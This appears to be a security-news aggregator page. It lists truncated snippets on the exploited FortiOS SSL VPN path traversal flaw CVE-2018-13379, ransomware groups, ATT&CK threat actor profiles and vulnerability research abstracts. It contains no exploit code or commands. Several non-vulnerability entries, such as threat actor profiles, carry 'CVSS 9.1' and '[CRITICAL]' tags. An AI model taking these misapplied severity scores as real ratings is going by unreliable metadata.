CVE-2018-13379 (FG-IR-18-384) – This is a path traversal vulnerability in the FortiOS SSL VPN web portal that could potentially allow an unauthenticated attacker to download files through specially crafted HTTP resource requests.
CVE-2018-13383 (FG-IR-18-388) – This heap buffer overflow vulnerability in t
Tenable
CVE-2018-13379, CVE-2019-11510: FortiGate and Pulse Connect Secure Vulnerabilities Exploited In the Wild
blogs_tenable·2019-08-27·CVSS 9.1
[CRITICAL] CVE-2018-13379, CVE-2019-11510: FortiGate and Pulse Connect Secure Vulnerabilities Exploited In the Wild
Fortinet
Beware of Emails Purporting to be from the IRS
blogs_fortinet·2018-09-17
Beware of Emails Purporting to be from the IRS
FORTIGUARD LABS THREAT RESEARCH
Beware of Emails Purporting to be from the IRS
By FortiGuard SE Team | September 17, 2018
The FortiGuard SE team has come across a peculiar phishing campaign purporting to be from the United States Internal Revenue Service (IRS), which is titled “2018 UPDATE: NON RESIDENT ALIEN TAX WITHHOLDING (IRS ).”
Peculiar because we are almost five months from the original tax deadline of April 15th in the United States. However, since individuals are allowed a six-month extension to provide more time to file, the final deadline is October 15th, which is now approaching. Such a campaign is likely to net an unwitting victim who is not aware of such scams, especially if they are a non-resident alien unfamiliar with US laws and procedures.
Before we take a look at this at
Fortinet
Critical SamSam Ransomware Update
blogs_fortinet·2018-07-31
Critical SamSam Ransomware Update
FORTIGUARD LABS THREAT RESEARCH
Critical SamSam Ransomware Update
By FortiGuard SE Team | July 31, 2018
In conjunction with the Cyber Threat Alliance, Sophos today released a detailed analysis of a highly sophisticated ransomware threat group that has been dubbed “SamSam.” As part of Fortinet’s membership with the Cyber Threat Alliance (CTA), FortiGuard Labs received all related indicators of compromise (IoCs) ahead of publication to ensure that FortiGuard customers are protected from this latest disclosure. The SamSam ransomware first appeared in late 2015 as a reasonably low-profile risk. Since then, however, it has aggressively expanded, targeting a wide range of organizations, from healthcare and educational institutions to local governments. Sophos has estimated that, to date, the g
Threat Intel
APT29 (APT29, IRON RITUAL, IRON HEMLOCK)
threat_intel
APT29 (APT29, IRON RITUAL, IRON HEMLOCK)
# Threat Actor Profile: APT29
ATT&CK ID: G0016
Also known as: APT29, IRON RITUAL, IRON HEMLOCK, NobleBaron, Dark Halo, NOBELIUM, UNC2452, YTTRIUM, The Dukes, Cozy Bear, CozyDuke, SolarStorm, Blue Kitsune, UNC3524, Midnight Blizzard
Suspected origin: Russia
## Overview
APT29 is a threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. APT29 reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DN
Threat Intel
Magic Hound (Magic Hound, TA453, COBALT ILLUSION)
threat_intel·CVSS 9.1
[CRITICAL] Magic Hound (Magic Hound, TA453, COBALT ILLUSION)
# Threat Actor Profile: Magic Hound
ATT&CK ID: G0059
Also known as: Magic Hound, TA453, COBALT ILLUSION, Charming Kitten, ITG18, Phosphorus, Newscaster, APT35, Mint Sandstorm
Suspected origin: Iran
## Overview
Magic Hound is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Pr
Greynoiseio
Battling Ransomware One Tag At A Time
blogs_greynoiseio
Battling Ransomware One Tag At A Time
Recorded Future
Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
blogs_recorded_future
Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
# Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
In response to the COVID-19 pandemic, many organizations have shifted to working from home for the foreseeable future — this means that organizations will have a largely (or entirely) remote workforce for the first time.
This creates a situation that is ripe for cybercriminals and nation-state actors to exploit. As we have observed with the rapid adoption of COVID-19-themed scams and attacks against the Olympics, threat actors — both nation-state and cybercriminal — are quick to exploit new and evolving situations.
For security teams, the sudden change in an organization’s network topology means a vastly expanded attack surface with little time to adapt to the new reality. For employees, generally,
Sentinelone
REvil
blogs_sentinelone
REvil
# REvil Ransomware: In-Depth Analysis, Detection, and Mitigation
As if ransomware itself wasn’t dangerous enough, a new type of attack involving ransomware is making waves in the cybersecurity community. Ransomware-as-a-Service (RaaS) operations are becoming more common and more profitable for threat actors looking to launch a variety of attacks. One such operation, known as REvil, involved a core team of threat actors offering the malware to other attackers for a price.
Although the Russian Federal Security Service claims to have dismantled REvil and charged several of the ransomware group’s members, a deeper look at this type of ransomware and RaaS can help organizations protect themselves against these types of attacks in the future.
## What Is REvil Ransomware?
REvil ransomwa
Threat Intel
Agrius (Agrius, Pink Sandstorm, AMERICIUM)
threat_intel·CVSS 9.1
[CRITICAL] Agrius (Agrius, Pink Sandstorm, AMERICIUM)
# Threat Actor Profile: Agrius
ATT&CK ID: G1030
Also known as: Agrius, Pink Sandstorm, AMERICIUM, Agonizing Serpens, BlackShadow
Suspected origin: Iran
## Overview
Agrius is an Iranian threat actor active since 2020 notable for a series of ransomware and wiper operations in the Middle East, with an emphasis on Israeli targets.(Citation: SentinelOne Agrius 2021)(Citation: CheckPoint Agrius 2023) Public reporting has linked Agrius to Iran's Ministry of Intelligence and Security (MOIS).(Citation: Microsoft Iran Cyber 2023)
## Techniques (TTPs)
### Resource Development
- T1583 Acquire Infrastructure
Usage: Agrius typically uses commercial VPN services for anonymizing last-hop traffic to victim networks, such as ProtonVPN.(Citation: SentinelOne Agrius 2021)
### Initial Access
- T1078.002 Do
Threat Intel
Play (Play)
threat_intel·CVSS 9.1
[CRITICAL] Play (Play)
# Threat Actor Profile: Play
ATT&CK ID: G1040
Also known as: Play
## Overview
Play is a ransomware group that has been active since at least 2022 deploying Playcrypt ransomware against the business, government, critical infrastructure, healthcare, and media sectors in North America, South America, and Europe. Play actors employ a double-extortion model, encrypting systems after exfiltrating data, and are presumed by security researchers to operate as a closed group.(Citation: CISA Play Ransomware Advisory December 2023)(Citation: Trend Micro Ransomware Spotlight Play July 2023)
## Techniques (TTPs)
### Resource Development
- T1587.001 Malware
Usage: Play developed and employs Playcrypt ransomware.(Citation: Trend Micro Ransomware Spotlight Play July 2023)(Citation: CISA Play Ransomware A
Recorded Future
Semiconductor Companies Targeted by Ransomware | Recorded Future
blogs_recorded_future
Semiconductor Companies Targeted by Ransomware | Recorded Future
## Semiconductor Companies Targeted by Ransomware
This report examines ransomware attacks on semiconductor companies to date in 2022. We analyzed the strategic importance of the semiconductor industry and the unique role it plays in the increasingly complex geopolitical environment. We also identified the tactics, techniques, and procedures (TTPs) used by ransomware actors in their attacks.
## Executive Summary
We identified 8 semiconductor companies that were attacked and extorted by ransomware actors thus far in 2022. These attacks included the use of LockBit, LV ransomware, and Cuba ransomware, and were conducted by extortion groups including the Lapsus$ Group and RansomHouse. We analyzed the TTPs of each group and the possible motivations behind the attack. In addition, we explored
Threat Intel
Dragonfly (Dragonfly, TEMP.Isotope, DYMALLOY)
threat_intel
Dragonfly (Dragonfly, TEMP.Isotope, DYMALLOY)
# Threat Actor Profile: Dragonfly
ATT&CK ID: G0035
Also known as: Dragonfly, TEMP.Isotope, DYMALLOY, Berserk Bear, TG-4192, Crouching Yeti, IRON LIBERTY, Energetic Bear, Ghost Blizzard, BROMINE
Suspected origin: Russia
## Overview
Dragonfly is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, Dragonfly has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 201
Recorded Future
In Before The Lock: ESXi | Recorded Future
blogs_recorded_future
In Before The Lock: ESXi | Recorded Future
## In Before The Lock: ESXi
## Executive Summary
As organizations continue virtualizing their critical infrastructure and business systems, threat actors deploying ransomware have responded in kind. Between 2021 and 2022 we observed an approximately 3-fold increase in ransomware targeting ESXi, with offerings available from many groups including ALPHV, LockBit, and BlackBasta. We identified and described detection strategies for multiple TTPs that are often seen prior to the dropping of the ransomware payload in order to create detections and mitigations that are based on real-world, threat-actor use of these tools. In addition to providing tool-specific detections such as YARA and Sigma rules, we also identified detections for common enumeration, exploitation, and persistence technique
Sentinelone
Avaddon
blogs_sentinelone·CVSS 9.1
[CRITICAL] Avaddon
# Avaddon Ransomware: In-Depth Analysis, Detection, and Mitigation
## Summary of Avaddon Ransomware
Avaddon RaaS (Ransomware-as-a-service) emerged in early 2019. Avaddon practices double extortion – demanding payment for a decryptor, as well as for the non-release of stolen data. Avaddon was advertised heavily in underground markets. Avaddon, as a selling point, provided affiliates with a higher percentage of profit than some other contemporary services.
In 2021, Avaddon “shut down” and released decryption keys for all existing victims.
## What Does Avaddon Ransomware Target?
Avaddon ransomware has been observed targeting businesses in various industries, including healthcare, government, financial, legal, hospitality, education, and retail. Additionally, some Avaddon affiliates have
Huntress
The Top Four CVEs Attackers Exploit | Huntress
blogs_huntress·CVSS 9.8
[CRITICAL] The Top Four CVEs Attackers Exploit | Huntress
While the move to remote work last year gave many of us comforts such as working in our pajamas and being 10 steps away from the fridge, it’s been a bit of a nightmare for those who work in cybersecurity.
The Institute for Security and Technology reports that in 2020, the victims of ransomware attacks paid $350M in ransom—a more than 300% increase over the previous year. By this year’s end, it’s predicted that cybercrime will cost the world $6 trillion. While cybercrime is a lucrative gig for hackers, it's expensive for the rest of us—and unfortunately, it's only getting worse with remote work.
In many ways, remote work has removed many of the security measures that organizations typically put in place to keep their data and networks secure. For example, corporate networks usually only a
arXiv
VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
arxiv_fulltext·2025-02-16
VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
Yuning Jiang (National University of Singapore, Singapore; ORCID 0000-0003-4791-8452), Nay Oo (NCS Cyber Special Ops R&D, Singapore), Qiaoran Meng (National University of Singapore, Singapore), Hoon Wei Lim (NCS Cyber Special Ops R&D, Singapore), Biplab Sikdar (National University of Singapore, Singapore)
## Abstract
As interconnected systems proliferate, safeguarding complex infrastructures against an escalating array of cyber threats has become an urgent challenge. The growing number of vulnerabilities, coupled with resource constraints, makes addressing every vulnerability impractical, thereby rende
arXiv
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
arxiv_fulltext·2024-07-31
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
Raveen Kanishka Jayalath* (University of Adelaide, Australia), Hussain Ahmad* (University of Adelaide, Australia; corresponding author), Diksha Goel (CSIRO's Data61, Australia), Muhammad Shuja Syed (SLB, USA), Faheem Ullah (University of Adelaide, Australia)
*These authors contributed equally to this work.
## Abstract
Microservice architectures are revolutionizing both small businesses and large corporations, igniting a new era of innovation with their exceptional advantages in maintainability, reusability, and scalability. However, these benefits come w
Timeline: published 2019-06-04; added to CISA KEV 2021-11-03; exploited in the wild.